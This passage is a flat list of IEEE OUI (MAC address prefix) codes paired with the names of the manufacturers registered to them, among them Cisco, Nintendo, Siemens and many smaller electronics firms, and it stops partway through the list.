10880F Daruma Telecomunicações e Informática S.A. FC6198 NEC Personal Products, Ltd 406186 MICRO-STAR INT'L CO.,LTD A8CE90 CVC E41F13 IBM Corp 54B620 SUHDOL E&C Co.Ltd. 78C40E H&D Wireless E84ECE Nintendo Co., Ltd. 1045F8 LNT-Automation GmbH DCE71C AUG Elektronik GmbH A870A5 UniComm Inc. A07332 Cashmaster International Limited 64C6AF AXERRA Networks Ltd 701AED ADVAS CO., LTD. 6465C0 Nuvon, Inc 44568D PNC Technologies Co., Ltd. 7C1EB3 2N TELEKOMUNIKACE a.s. 4456B7 Spawn Labs, Inc 44C9A2 Greenwald Industries 74D850 Evrisko Systems 78998F MEDILINE ITALIA SRL 40ECF8 Siemens AG 906DC8 DLG Automação Industrial Ltda 584CEE Digital One Technologies, Limited 0026B2 Setrix GmbH 0026AF Duelco A/S 0026B3 Thales Communications Inc 0026A4 Novus Produtos Eletronicos Ltda 0026A2 Instrumentation Technology Systems 00269F Private 00270F Envisionnovation Inc 00270A IEE S.A. 002709 Nintendo Co., Ltd. 002701 INCOstartec GmbH 0026FB AirDio Wireless, Inc. 0026F5 XRPLUS Inc. 0026F8 Golden Highway Industry Development Co., Ltd. 0026F4 Nesslab 0026EE TKM GmbH 0026EF Technology Advancement Group, Inc. 0026E6 Visionhitech Co., Ltd. 0026DF TaiDoc Technology Corp. 0026D8 Magic Point Inc. 0026D6 Ningbo Andy Optoelectronic Co., Ltd. 00271A Geenovo Technology Ltd. 002714 Grainmustards, Co,ltd. 002715 Rebound Telecom. Co., Ltd 0026D1 S Squared Innovations Inc. 0026D3 Zeno Information System 0026CB Cisco Systems, Inc 002687 corega K.K 002699 Cisco Systems, Inc 00268D CellTel S.p.A. 00262A Proxense, LLC 002628 companytec automação e controle ltda. 00261F SAE Magnetics (H.K.) Ltd. 00261E QINGBANG ELEC(SZ) CO., LTD 002619 FRC 0025D7 CEDO 0025D8 KOREA MAINTENANCE 0025D2 InpegVision Co., Ltd 0025C9 SHENZHEN HUAPU DIGITAL CO., LTD 002653 DaySequerra Corporation 002647 WFE TECHNOLOGY CORP. 002640 Baustem Broadband Technologies, Ltd. 0025FC ENDA ENDUSTRIYEL ELEKTRONIK LTD. STI. 0025FA J&M Analytik AG 0025EA Iphion BV 00266B SHINE UNION ENTERPRISE LIMITED 002667 CARECOM CO.,LTD. 0025F0 Suga Electronics Limited 0025E8 Idaho Technology 0025E4 OMNI-WiFi, LLC 002633 MIR - Medical International Research 002630 ACOREL S.A.S 0025FE Pilot Electronics Corporation 00267B GSI Helmholtzzentrum für Schwerionenforschung GmbH 00266A ESSENSIUM NV 00257B STJ ELECTRONICS PVT LTD 00257C Huachentel Technology Development Co., Ltd 002575 FiberPlex Technologies, LLC 002570 Eastern Communications Company Limited 00256A inIT - Institut Industrial IT 002562 interbro Co. Ltd. 002551 SE-Elektronic GmbH 00254D Singapore Technologies Electronics Limited 00254C Videon Central, Inc. 002543 MONEYTECH 00253A CEVA, Ltd. 00255B CoachComm, LLC 0025A0 Nintendo Co., Ltd. 00259B Beijing PKUNITY Microsystems Technology Co., Ltd 002596 GIGAVISION srl 002595 Northwest Signal Supply, Inc 00258F Trident Microsystems, Inc. 002520 SMA Railway Technology GmbH 002516 Integrated Design Tools, Inc. 002589 Hills Industries Limited 002585 KOKUYO S&T Co., Ltd. 002581 x-star networks Inc. 002527 Bitrode Corp. 002525 CTERA Networks Ltd. 0025BE Tektrap Systems Inc. 0025B5 Cisco Systems, Inc 0024F3 Nintendo Co., Ltd. 0024E5 Seer Technology, Inc 002496 Ginzinger electronic systems 00248A Kaga Electronics Co., Ltd. 002499 Aquila Technologies 002487 Transact Campus, Inc. 0024B9 Wuhan Higheasy Electronic Technology Development Co.Ltd 0024BD Hainzl Industriesysteme GmbH 002501 JSC "Supertel" 0024F7 Cisco Systems, Inc 0024E0 DS Tech, LLC 0024E2 HASEGAWA ELECTRIC CO.,LTD. 002477 Tibbo Technology 002510 Pico-Tesla Magnetic Therapies 0024C8 Broadband Solutions Group 0024C5 Meridian Audio Limited 00243B CSSI (S) Pte Ltd 002435 WIDE CORPORATION 002431 Uni-v co.,ltd 002432 Neostar Technology Co.,LTD 002430 Ruby Tech Corp. 00242E Datastrip Inc. 002408 Pacific Biosciences 00240C DELEC GmbH 0023F9 Double-Take Software, INC. 0023F5 WILO SE 0023FF Beijing HTTC Technology Ltd. 0023F6 Softwell Technology Co., Ltd. 002451 Cisco Systems, Inc 00244A Voyant International 002447 Kaztek Systems 002443 Nortel Networks 002441 Wanzl Metallwarenfabrik GmbH 002458 PA Bastion CC 00245D Terberg besturingstechniek B.V. 002450 Cisco Systems, Inc 0023F3 Glocom, Inc. 0023F0 Shanghai Jinghan Weighing Apparatus Co. Ltd. 0023EA Cisco Systems, Inc 0023E5 IPaXiom Networks 002414 Cisco Systems, Inc 002410 NUETEQ Technology,Inc. 00246E Phihong USA Corp. 002473 3COM EUROPE LTD 00246B Covia, Inc. 00241A Red Beetle Inc. 0023C0 Broadway Networks 0023B6 SECURITE COMMUNICATIONS / HONEYWELL 0023B8 Sichuan Jiuzhou Electronic Technology Co.,Ltd 0023BA Chroma 0023BC EQ-SYS GmbH 0023B1 Longcheer Technology (Singapore) Pte Ltd 002358 SYSTEL SA 002356 Packet Forensics LLC 002350 RDC, Inc. dba LynTec 00234F Luminous Power Technologies Pvt. Ltd. 002349 Helmholtz Centre Berlin for Material and Energy 002346 Vestac 002344 Objective Interface Systems, Inc. 0023A1 Trend Electronics Ltd 0023A6 E-Mon 0023A8 Marshall Electronics 00239A EasyData Hardware GmbH 002396 ANDES TECHNOLOGY CORPORATION 002379 Union Business Machines Co. Ltd. 002377 Isotek Electronics Ltd 002371 SOAM Systel 00233C Alflex 002333 Cisco Systems, Inc 00232E Kedah Electronics Engineering, LLC 002394 Samjeon 00238C Private 002364 Power Instruments Pte Ltd 002362 Goldline Controls 00235E Cisco Systems, Inc 0023CC Nintendo Co., Ltd. 002320 Nicira Networks 002322 KISS Teknical Solutions, Inc. 0022C7 SEGGER Microcontroller GmbH & Co. KG 0022C1 Active Storage Inc. 0022C2 Proview Eletrônica do Brasil LTDA 0022BD Cisco Systems, Inc 0022BA HUTH Elektronik Systeme GmbH 0022BB beyerdynamic GmbH & Co. KG 0022B6 Superflow Technologies Group 0022B5 NOVITA 0022B2 4RF Communications Ltd 0022AC Hangzhou Siyuan Tech. Co., Ltd 0022AD TELESIS TECHNOLOGIES, INC. 0022AE Mattel Inc. 002305 Cisco Systems, Inc 0022FF NIVIS LLC 002302 Cobalt Digital, Inc. 0022F5 Advanced Realtime Tracking GmbH 00227E Chengdu 30Kaitian Communication Industry Co.Ltd 00227C Woori SMT Co.,ltd 002277 NEC Australia Pty Ltd 002279 Nippon Conlux Co., Ltd. 002271 Jäger Computergesteuerte Meßtechnik GmbH. 0022D1 Albrecht Jung GmbH & Co. KG 0022D2 All Earth Comércio de Eletrônicos LTDA. 0022CA Anviz Biometric Tech. Co., Ltd. 002317 Lasercraft Inc 00230E Gorba AG 002307 FUTURE INNOVATION TECH CO.,LTD 0022E5 Fisher-Rosemount Systems Inc. 0022E4 APASS TECHNOLOGY CO., LTD. 0022D5 Eaton Corp. Electrical Group Data Center Solutions - Pulizzi 0022A3 California Eastern Laboratories 0022A0 APTIV SERVICES US, LLC 00228F CNRS 002297 XMOS Semiconductor 002292 Cinetal 00225E Uwin Technologies Co.,LTD 002258 Taiyo Yuden Co., Ltd. 00225B Teradici Corporation 002259 Guangzhou New Postcom Equipment Co.,Ltd. 002253 Entorian Technologies 00223D JumpGen Systems, LLC 002239 Indiana Life Sciences Incorporated 002235 Strukton Systems bv 00222C Ceton Corp 0021E0 CommAgility Ltd 0021DE Firepro Wireless 0021D3 BOCOM SECURITY(ASIA PACIFIC) LIMITED 0021CC Flextronics International 002217 Neat Electronics 002211 Rohati Systems 002212 CAI Networks, Inc. 00220D Cisco Systems, Inc 002208 Certicom Corp 002205 WeLink Solutions, Inc. 002209 Omron Healthcare Co., Ltd 0021F9 WIRECOM Technologies 0021FA A4SP Technologies Ltd. 0021F0 EW3 Technologies LLC 0021EE Full Spectrum Inc. 0021EC Solutronic GmbH 0021E6 Starlight Video Limited 0021CF The Crypto Group 0021C5 3DSP Corp 0021B9 Universal Devices Inc. 00224F Byzoro Networks Ltd. 002251 Lumasense Technologies 002247 DAC ENGINEERING CO., LTD. 00222D SMC Networks Inc. 00222A SoundEar A/S 00221F eSang Technologies Co., Ltd. 00214B Shenzhen HAMP Science & Technology Co.,Ltd 002145 Semptian Technologies Ltd. 00213E TomTom International BV 00213F A-Team Technology Ltd. 00218A Electronic Design and Manufacturing Company 00218B Wescon Technology, Inc. 002184 POWERSOFT SRL 00217A Sejin Electron, Inc. 002178 Matuschek Messtechnik GmbH 002199 Vacon Plc 0021A0 Cisco Systems, Inc 002198 Thai Radio Co, LTD 00218C TopControl GMBH 0021B3 Ross Controls 0021B6 Triacta Power Technologies Inc. 0021AE ALCATEL-LUCENT FRANCE - WTD 0021AF Radio Frequency Systems 0021A4 Dbii Networks 002153 SeaMicro Inc. 002154 D-TACQ Solutions Ltd 002121 VRmagic GmbH 002123 Aerosat Avionics 002173 Ion Torrent Systems, Inc. 002177 W. L. Gore & Associates 002172 Seoultek Valley 002169 Prologix, LLC. 00211B Cisco Systems, Inc 00210A byd:sign Corporation 00212D SCIMOLEX CORPORATION 001FE0 EdgeVelocity Corp 001FD8 A-TRUST COMPUTER CORPORATION 001FD7 TELERAD SA 001FD3 RIVA Networks Inc. 001FD5 MICRORISC s.r.o. 002107 Seowonintech Co Ltd. 001FFE HPN Supply Chain 001FFF Respironics, Inc. 001FFC Riccius+Sohn GmbH 001FFD Indigo Mobile Technologies Corp. 001FCA Cisco Systems, Inc 001FC3 SmartSynch, Inc 001FC1 Hanlong Technology Co.,LTD 001F7A WiWide Inc. 001F77 HEOL DESIGN 001F76 AirLogic Systems Inc. 001F73 Teraview Technology Co., Ltd. 001F62 JSC "Stilsoft" 001F67 Hitachi,Ltd. 001F61 Talent Communication Networks Inc. 001FEE ubisys technologies GmbH 001FEF SHINSEI INDUSTRIES CO.,LTD 001FEC Synapse Électronique 001FE8 KURUSUGAWA Electronics Industry Inc,. 001F8E Metris USA Inc. 001F89 Signalion GmbH 001F8A Ellion Digital Inc. 001F7F Phabrix Limited 001F7C Witelcom AS 001FBB Xenatech Co.,LTD 001FB1 Cybertech Inc. 001FB2 Sontheim Industrie Elektronik GmbH 001FAB I.S HIGH TECH.INC 001FAC Goodmill Systems Ltd 001F44 GE Transportation Systems 001F39 Construcciones y Auxiliar de Ferrocarriles, S.A. 001F3D Qbit GmbH 001F36 Bellwin Information Co. Ltd., 001F38 POSITRON 001F2D Electro-Optical Imaging, Inc. 001EE4 ACS Solutions France 001EED Adventiq Ltd. 001ED2 Ray Shine Video Technology Inc 001ED4 Doble Engineering 001ECE BISA Technologies (Hong Kong) Limited 001F03 NUM AG 001EFD Microbit 2.0 AB 001EFF Mueller-Elektronik GmbH & Co. KG 001F05 iTAS Technology Corp. 001F07 AZTEQ Mobile 001EF6 Cisco Systems, Inc 001EF9 Pascom Kommunikations systeme GmbH. 001EF3 From2 001EE7 Epic Systems Inc 001EE9 Stoneridge Electronics AB 001EC8 Rapid Mobile (Pty) Ltd 001ECC CDVI 001EC5 Middle Atlantic Products Inc 001EBE Cisco Systems, Inc 001EC3 Kozio, Inc. 001EBD Cisco Systems, Inc 001F2F Berker GmbH & Co. KG 001F32 Nintendo Co., Ltd. 001F1C KOBISHI ELECTRIC Co.,Ltd. 001F19 BEN-RI ELECTRONICA S.A. 001F11 OPENMOKO, INC. 001F56 DIGITAL FORECAST 001F52 UVT Unternehmensberatung fur Verkehr und Technik GmbH 001F4F Thinkware Co. Ltd. 001EB9 Sing Fai Technology Limited 001EB7 TBTech, Co., Ltd. 001E5B Unitron Company, Inc. 001E5E COmputime Ltd. 001E54 TOYO ELECTRIC Corporation 001E4D Welkin Sciences, LLC 001E09 ZEFATEK Co.,LTD 001E06 WIBRAIN 001E0C Sherwood Information Partners, Inc. 001E02 Sougou Keikaku Kougyou Co.,Ltd. 001E01 Renesas Technology Sales Co., Ltd. 001DFF Network Critical Solutions Ltd 001E00 Shantou Institute of Ultrasonic Instruments 001DF3 SBS Science & Technology Co., Ltd 001E95 SIGMALINK 001E93 CiriTech Systems Inc 001E92 JEULIN S.A. 001E91 KIMIN Electronic Co., Ltd. 001E89 CRFS Limited 001E86 MEL Co.,Ltd. 001E88 ANDOR SYSTEM SUPPORT CO., LTD. 001E4B City Theatrical 001E4A Cisco Systems, Inc 001E3C Lyngbox Media AB 001E2C CyVerse Corporation 001E26 Digifriends Co. Ltd 001E23 Electronic Educational Devices, Inc 001E79 Cisco Systems, Inc 001E76 Thermo Fisher Scientific 001E72 PCS 001EA2 Symx Systems, Inc. 001EA9 Nintendo Co., Ltd. 001E9E ddm hopt + schuler Gmbh + Co. KG 001E9D Recall Technologies, Inc. 001E69 Thomson Inc. 001E5F KwikByte, LLC 001E13 Cisco Systems, Inc 001E0D Micran Ltd. 001DDD DAT H.K. LIMITED 001DE2 Radionor Communications 001DD7 Algolith 001DC9 GainSpan Corp. 001DC7 L-3 Communications Geneva Aerospace 001DEE NEXTVISION SISTEMAS DIGITAIS DE TELEVISÃO LTDA. 001DEA Commtest Instruments Ltd 001DE4 Visioneered Image Systems 001D89 VaultStor Corporation 001D86 Shinwa Industries(China) Ltd. 001DBC Nintendo Co., Ltd. 001DB6 BestComm Networks, Inc. 001D66 Hyundai Telecom 001D77 NSGate 001D76 Eyeheight Ltd. 001D7A Wideband Semiconductor, Inc. 001D88 Clearwire 001D81 GUANGZHOU GATEWAY ELECTRONICS CO., LTD 001D68 Thomson Telecom Belgium 001D61 BIJ Corporation 001D5C Tom Communication Industrial Co.,Ltd. 001DA2 Cisco Systems, Inc 001D99 Cyan Optic, Inc. 001D9B Hokuyo Automatic Co., Ltd. 001DAC Gigamon Systems LLC 001CE1 INDRA SISTEMAS, S.A. 001CE0 DASAN TPS 001CD9 GlobalTop Technology Inc. 001CDA Exegin Technologies Limited 001D1C Gennet s.a. 001D15 Shenzhen Dolphin Electronic Co., Ltd 001D16 SFR 001D11 Analogue & Micro Ltd 001D12 ROHM CO., LTD. 001D47 Covote GmbH & Co KG 001D41 Hardy Instruments 001D3D Avidyne Corporation 001D3C Muscle Corporation 001D3A mh acoustics LLC 001D35 Viconics Electronics Inc. 001D56 Kramer Electronics Ltd. 001D4E TCM Mobile LLC 001D49 Innovation Wireless Inc. 001D46 Cisco Systems, Inc 001D48 Sensor-Technik Wiedemann GmbH 001D31 HIGHPRO INTERNATIONAL R&D CO,.LTD. 001D26 Rockridgesound Technology Co. 001D21 Alcad SL 001CD2 King Champion (Hong Kong) Limited 001CCE By Techdesign 001CF1 SUPoX Technology Co. , LTD. 001CF3 EVS BROADCAST EQUIPMENT 001CF4 Media Technology Systems Inc 001CE6 INNES 001D03 Design Solutions Inc. 001CF9 Cisco Systems, Inc 001CB9 KWANG SUNG ELECTRONICS CO., LTD. 001CA3 Terra 001C97 Enzytek Technology Inc., 001C90 Empacket Corporation 001C8E Alcatel-Lucent IPD 001C8F Advanced Electronic Design, Inc. 001C88 TRANSYSTEM INC. 001C86 Cranite Systems, Inc. 001C21 Nucsafe Inc. 001C1E emtrion GmbH 001C18 Sicert S.r.L. 001C1A Thomas Instrumentation, Inc 001BF4 KENWIN INDUSTRIAL(HK) LTD. 001BF9 Intellitect Water Ltd 001BFA G.i.N. mbH 001BF3 TRANSRADIO SenderSysteme Berlin AG 001C3A Element Labs, Inc. 001C3D WaveStorm 001C2D FlexRadio Systems 001C2C Synapse 001C7F Check Point Software Technologies 001C78 WYPLAY SAS 001C6E Newbury Networks, Inc. 001C6B COVAX Co. Ltd 001C69 Packet Vision Ltd 001C4F MACAB AB 001C4E TASA International Limited 001C4B Gener8, Inc. 001C40 VDG-Security bv 001CA6 Win4NET 001CA9 Audiomatica Srl 001CA1 AKAMAI TECHNOLOGIES, INC. 001C99 Shunra Software Ltd. 001C9B FEIG ELECTRONIC GmbH 001C95 Opticomm Corporation 001C0E Cisco Systems, Inc 001C13 OPTSYS TECHNOLOGY CO., LTD. 001C0B SmartAnt Telecom 001C08 Echo360, Inc. 001C65 JoeScan, Inc. 001C5F Winland Electronics, Inc. 001C58 Cisco Systems, Inc 001C5A Advanced Relay Corporation 001B51 Vector Technology Corp. 001B54 Cisco Systems, Inc 001B4A W&W Communications, Inc. 001B44 SanDisk Corporation 001B46 Blueone Technology Co.,Ltd 001B40 Network Automation mxc AB 001BD4 Cisco Systems, Inc 001BD0 IDENTEC SOLUTIONS 001BCD DAVISCOMMS (S) PTE LTD 001BCA Beijing Run Technology LTD. Company 001BCC KINGTEK CCTV ALLIANCE CO., LTD. 001BC8 MIURA CO.,LTD 001BC1 HOLUX Technology, Inc. 001BBC Silver Peak Systems, Inc. 001BAB Telchemy, Incorporated 001BAE Micro Control Systems, Inc 001BDE Renkus-Heinz, Inc. 001BDB Valeo VECS 001BD8 FLIR Systems Inc 001B65 China Gridcom Co., Ltd 001B64 IsaacLandKorea Co., Ltd, 001B97 Violin Technologies 001B88 Divinet Access Technologies Ltd 001B71 Telular Corp. 001B73 DTL Broadcast Ltd 001B83 Finsoft Ltd 001B81 DATAQ Instruments, Inc. 001B7D CXR Anderson Jacobson 001B79 FAIVELEY TRANSPORT 001BA8 UBI&MOBI,.Inc 001BA0 Awox 001B42 Wise & Blue 001B35 ChongQing JINOU Science & Technology Development CO.,Ltd 001B36 Tsubata Engineering Co.,Ltd. (Head Office) 001B39 Proxicast 001B3B Yi-Qing CO., LTD 001AFA Welch Allyn, Inc. 001AF7 dataschalt e+a GmbH 001AF3 Samyoung Electronics 001AEF Loopcomm Technology, Inc. 001AEC Keumbee Electronics Co.,Ltd. 001B26 RON-Telecom ZAO 001B20 TPine Technology 001B1C Coherent 001B22 Palit Microsystems ( H.K.) Ltd. 001AA9 FUJIAN STAR-NET COMMUNICATION CO.,LTD 001AA8 Mamiya Digital Imaging Co., Ltd. 001A99 Smarty (HZ) Information Electronics Co., Ltd 001ABA Caton Overseas Limited 001AB3 VISIONITE INC. 001B19 IEEE I&M Society TC9 001B13 Icron Technologies Corporation 001ACA Tilera Corporation 001AB9 PMC 001B0F Petratec 001AD1 FARGO CO., LTD. 001A96 ECLER S.A. 001A8C Sophos Ltd 001A91 FusionDynamic Ltd. 001A3E Faster Technology LLC 001A3A Dongahelecomm 001A3B Doah Elecom Inc. 001A3C Technowave Ltd. 001A40 A-FOUR TECH CO., LTD. 001A30 Cisco Systems, Inc 001A36 Aipermon GmbH & Co. KG 001A26 Deltanode Solutions AB 001A25 DELTA DORE 001A6D Cisco Systems, Inc 001A6E Impro Technologies 001A6C Cisco Systems, Inc 001A46 Digital Multimedia Technology Co., Ltd 001A4A Qumranet Inc. 001A7B Teleco, Inc. 001A15 gemalto e-Payment 001A0D HandHeld entertainment, Inc. 001A63 Elster Solutions, LLC, 001A59 Ircona 001A84 V One Multimedia Pte Ltd 0019FE SHENZHEN SEECOMM TECHNOLOGY CO.,LTD. 0019FD Nintendo Co., Ltd. 0019ED Axesstel Inc. 0019F6 Acconet (PTE) Ltd 001A0E Cheng Uei Precision Industry Co.,Ltd 001A01 Smiths Medical 0019D9 Zeutschel GmbH 0019CA Broadata Communications, Inc 0019D3 TRAK Microwave 0019C3 Qualitrol 0019BE Altai Technologies Limited 00198A Northrop Grumman Systems Corp. 001989 Sonitrol Corporation 001980 Gridpoint Systems 001983 CCT R&D Limited 0019B4 Intellio Ltd 0019BA Paradox Security Systems Ltd 0019A1 LG INFORMATION & COMM. 00197F PLANTRONICS, INC. 00197A MAZeT GmbH 0019CD Chengdu ethercom information technology Ltd. 0019A8 WiQuest Communications 001978 Datum Systems, Inc. 001968 Digital Video Networks(Shanghai) CO. LTD. 00194C Fujian Stelcom information & Technology CO.,Ltd 00194A TESTO AG 001939 Gigamips 00193A OESOLUTIONS 0018EE Videology Imaging Solutions, Inc. 0018EB Blue Zen Enterprises Private Limited 0018E2 Topdata Sistemas de Automacao Ltda 00191D Nintendo Co., Ltd. 001924 LBNL Engineering 00191A IRLINK 001916 PayTec AG 00190E Atech Technology Co., Ltd. 00196D Raybit Systems Korea, Inc 001970 Z-Com, Inc. 001960 DoCoMo Systems, Inc. 00195A Jenaer Antriebstechnik GmbH 00192F Cisco Systems, Inc 001922 CM Comandos Lineares 001905 SCHRACK Seconet AG 001907 Cisco Systems, Inc 0018FB Compro Technology 001950 Harman Multimedia 0018D0 AtRoad, A Trimble Company 0018D2 High-Gain Antennas LLC 0018D3 TEAMCAST 0018C6 OPW Fuel Management Systems 0018C3 CS Corporation 0018CA Viprinet GmbH 0018C7 Real Time Automation 001870 E28 Shanghai Limited 001872 Expertise Engineering 001874 Cisco Systems, Inc 001869 KINGJIM 00185B Network Chemistry, Inc 001861 Ooma, Inc. 001855 Aeromaritime Systembau GmbH 001851 SWsoft 001856 EyeFi, Inc 00184E Lianhe Technologies, Inc. 00184C Bogen Communications 00183B CENITS Co., Ltd. 0018BB Eliwell Controls srl 0018BF Essence Technology Solution, Inc. 0018B9 Cisco Systems, Inc 0018B8 New Voice International AG 00188F Montgomery Technology, Inc. 001884 Fon Technology S.L. 001880 Maxim Integrated Products 00187C INTERCROSS, LLC 0018DC Prostar Co., Ltd. 0018D1 Siemens Home & Office Comm. Devices 0018A1 Tiqit Computers, Inc. 001896 Great Well Electronic LTD 001890 RadioCOM, s.r.o. 0018AA Protec Fire Detection plc 001812 Beijing Xinwei Telecom Technology Co., Ltd. 00180B Brilliant Telecommunications 001810 IPTrade S.A. 001804 E-TEK DIGITAL TECHNOLOGY LIMITED 001809 CRESYN 001800 UNIGRAND LTD 0017FC Suprema Inc. 0017FD Amulet Hotkey 0017A2 Camrivox Ltd. 00179D Kelman Limited 001790 HYUNDAI DIGITECH Co, Ltd. 001791 LinTech GmbH 001795 Cisco Systems, Inc 0017DA Spans Logic 0017CF iMCA-GmbH 00183C Encore Software Limited 001841 High Tech Computer Corp 001826 Cale Access AB 00182D Artec Design 00182A Taiwan Video & Monitor 0017FB FA 0017D8 Magnum Semiconductor, Inc. 0017B9 Gambro Lundia AB 0017B3 Aftek Infosys Limited 001819 Cisco Systems, Inc 001712 ISCO International 00170D Dust Networks Inc. 00170C Twig Com Ltd. 00170B Contela, Inc. 00170F Cisco Systems, Inc 001704 Shinco Electronics Group Co.,Ltd 001707 InGrid, Inc 00175C SHARP CORPORATION 001759 Cisco Systems, Inc 001754 Arkino HiTOP Corporation Limited 001752 DAGS, Inc 001756 Vinci Labs Oy 00171E Theo Benning GmbH & Co. KG 00176A Avago Technologies 00175F XENOLINK Communications Co., Ltd. 001782 LoBenn Inc. 00176B Kiyon, Inc. 001778 Central Music Co. 001774 Elesta GmbH 001777 Obsidian Research Corporation 001741 DEFIDEV 001738 International Business Machines 00172D Axcen Photonics Corporation 001799 SmarTire Systems Inc. 00177F Worldsmart Retech 001786 wisembed 001724 Studer Professional Audio GmbH 0016A4 Ezurio Ltd 001699 Tonic DVB Marketing Ltd 00169B Alstom Transport 001690 J-TEK INCORPORATION 001698 T&A Mobile Phones 001696 QDI Technology (H.K.) Limited 001666 Quantier Communication Inc. 001662 Liyuh Technology Ltd. 001661 Novatium Solutions (P) Ltd 001664 Prod-El SpA 00165E Precision I/O 001658 Fusiontech Technologies Inc. 001653 LEGO System A/S IE Electronics Division 001652 Hoatech Technologies, Inc. 001650 Kratos EPD 001642 Pangolin 0016AB Dansensor A/S 0016A5 Tandberg Storage ASA 0016A1 3Leaf Networks 0016C9 NAT Seattle, Inc. 0016C6 North Atlantic Industries 0016D2 Caspian 0016BE INFRANET, Inc. 0016D8 Senea AB 0016D6 TDA Tech Pty Ltd 0016D5 Synccom Co., Ltd 001685 Elisa Oyj 001680 Bally Gaming + Systems 001681 Vector Informatik GmbH 00BAC0 Biometric Access Company 001702 Osung Midicom Co., Ltd 0016F7 L-3 Communications, Aviation Recorders 0015C3 Ruf Telematik AG 0015B8 Tahoe 0015B6 ShinMaywa Industries, Ltd. 0015B0 AUTOTELENET CO.,LTD 0015B1 Ambient Corporation 0015A7 Robatech AG 00159F Terascala, Inc. 00159E Mad Catz Interactive Inc 0015A1 ECA-SINTERS 001608 Sequans Communications 0015FA Cisco Systems, Inc 0015FC Littelfuse Startco 0015F7 Wintecronics Ltd. 00163B Communications & Power Industries 001637 CITEL SpA 001630 Vativ Technologies 00162F Geutebrück GmbH 0015CB Surf Communication Solutions Ltd. 0015CC UQUEST, LTD. 0015C6 Cisco Systems, Inc 0015F8 Kingtronics Industrial Co. Ltd. 0015E6 MOBILE TECHNIKA Inc. 0015DB Canesta Inc. 0015D7 Reti Corporation 00162B Togami Electric Mfg.co.,Ltd. 001624 Teneros, Inc. 00161C e:cue 001581 MAKUS Inc. 00157A Telefin S.p.A. 001573 NewSoft Technology Corporation 001575 Nevis Networks Inc. 00156C SANE SYSTEM CO., LTD 00156A DG2L Technologies Pvt. Ltd. 001529 N3 Corporation 00152D TenX Networks, LLC 001523 Meteor Communications Corporation 001524 Numatics, Inc. 00154E IEC 001550 Nits Technology Inc 001546 ITG Worldwide Sdn Bhd 00153E Q-Matic Sweden AB 001542 MICROHARD S.R.L. 00156F Xiranet Communications GmbH 001572 Red-Lemon 001567 RADWIN Inc. 00155D Microsoft Corporation 00151B Isilon Systems Inc. 001510 Techsphere Co., Ltd 001562 Cisco Systems, Inc 00155B Sampo Corporation 001553 Cytyc Corporation 001551 RadioPulse Inc. 001552 Wi-Gear Inc. 001593 U4EA Technologies Inc. 00158D Jennic Ltd 001584 Schenck Process GmbH 001513 EFS sas 001503 PROFIcomms s.r.o. 001509 Plus Technology Co., Ltd 0014ED Airak, Inc. 0014E1 Data Display AG 0014E3 mm-lab GmbH 0014D9 IP Fabrics, Inc. 0014D6 Jeongmin Electronics Co.,Ltd. 0014D0 BTI Systems Inc. 0014CE NF CORPORATION 0014BB Open Interface North America 0014F9 Vantage Controls 001488 Akorri 001484 Cermate Technologies Inc. 001470 Prokom Software SA 001467 ArrowSpan Inc. 00145F ADITEC CO. LTD 001479 NEC Magnus Communications,Ltd. 00147B Iteris, Inc. 00147A Eubus GmbH 00146D RF Technologies 0014F0 Business Security OL AB 0014F2 Cisco Systems, Inc 0014E7 Stolinx,. Inc 0014E9 Nortech International 0014A0 Accsense, Inc. 00148B Globo Electronic GmbH & Co. KG 001490 ASP Corporation 0014AC Bountiful WiFi 0014A8 Cisco Systems, Inc 0013F8 Dex Security Solutions 0013F9 Cavera Systems 0013F2 Klas Ltd 0013F7 SMC Networks, Inc. 0013ED PSIA 0013BF Media System Planning Corp. 0013BB Smartvue Corporation 0013B5 Wavesat 0013AF NUMA Technology,Inc. 0013B0 Jablotron 0013B1 Intelligent Control Systems (Asia) Pte Ltd 0013E6 Technolution 0013DF Ryvor Corp. 0013D5 RuggedCom 0013D6 TII NETWORK TECHNOLOGIES, INC. 0013DB SHOEI Electric Co.,Ltd 0013CD MTI co. LTD 0013D3 MICRO-STAR INTERNATIONAL CO., LTD. 0013CA ATX 0013C5 LIGHTRON FIBER-OPTIC DEVICES INC. 0013C4 Cisco Systems, Inc 0013C2 WACOM Co.,Ltd 001459 Moram Co., Ltd. 001453 ADVANTECH TECHNOLOGIES CO.,LTD 001454 Symwave 001448 Inventec Multimedia & Telecom Corporation 00144B Hifn, Inc. 00143C Rheinmetall Canada Inc. 001435 CityCom Corp. 001426 NL Technology 00141A DEICY CORPORATION 00141C Cisco Systems, Inc 001416 Scosche Industries, Inc. 00140C GKB CCTV CO., LTD. 0013FE GRANDTEC ELECTRONIC CORP. 001330 EURO PROTECTION SURVEILLANCE 001325 Cortina Systems Inc 00133C QUINTRON SYSTEMS INC. 00133D Micro Memory Curtiss Wright Co 00133F Eppendorf Instrumente GmbH 001341 Shandong New Beiyang Information Technology Co.,Ltd 001331 CellPoint Connect 001335 VS Industry Berhad 00132F Interactek 001350 Silver Spring Networks, Inc 00134C YDT Technology International 0012FD OPTIMUS IC S.A. 001305 Epicom, Inc. 0012ED AVG Advanced Technologies 0012EA Trane 00139E Ciara Technologies Inc. 00139A K-ubique ID Corp. 00139D MaxLinear Hispania S.L.U. 00138D Kinghold 001390 Termtek Computer Co., Ltd 00137F Cisco Systems, Inc 001382 Cetacea Networks Corporation 001375 American Security Products Co. 001306 Always On Wireless 0012FA THX LTD 001358 Realm Systems, Inc. 001359 ProTelevision Technologies A/S 001297 O2Micro, Inc. 00129D First International Computer do Brasil 00129C Yulinet 001290 KYOWA Electric & Machinery Corp. 001291 KWS Computersysteme GmbH 001295 Aiware Inc. 00128B Sensory Networks Inc 00128F Montilio 0012A3 Trust International B.V. 0012A7 ISR TECHNOLOGIES Inc 0012AA IEE, Inc. 00129F RAE Systems 0012C6 TGC America, Inc 0012CC Bitatek CO., LTD 0012C1 Check Point Software Technologies 0012BB Telecommunications Industry Association TR-41 Committee 0012B6 Santa Barbara Infrared, Inc. 0012B9 Fusion Digital Technology 0012B4 Work Microwave GmbH 0012B5 Vialta, Inc. 0012B1 Dai Nippon Printing Co., Ltd 001289 Advance Sterilization Products 001284 Lab33 Srl 001281 March Networks S.p.A. 00127E Digital Lifestyles Group, Inc. 00125B KAIMEI ELECTRONI 001259 THERMO ELECTRON KARLSRUHE 00125A Microsoft Corporation 00126B Ascalade Communications Limited 0012C3 WIT S.A. 0012C8 Perfect tech 0012E7 Projectek Networking Electronics Corp. 0012E4 ZIEHL industrie-electronik GmbH + Co KG 0011EA IWICS Inc. 0011E2 Hua Jung Components Co., Ltd. 0011DA Vivaas Technology Inc. 0011DD FROMUS TEC. Co., 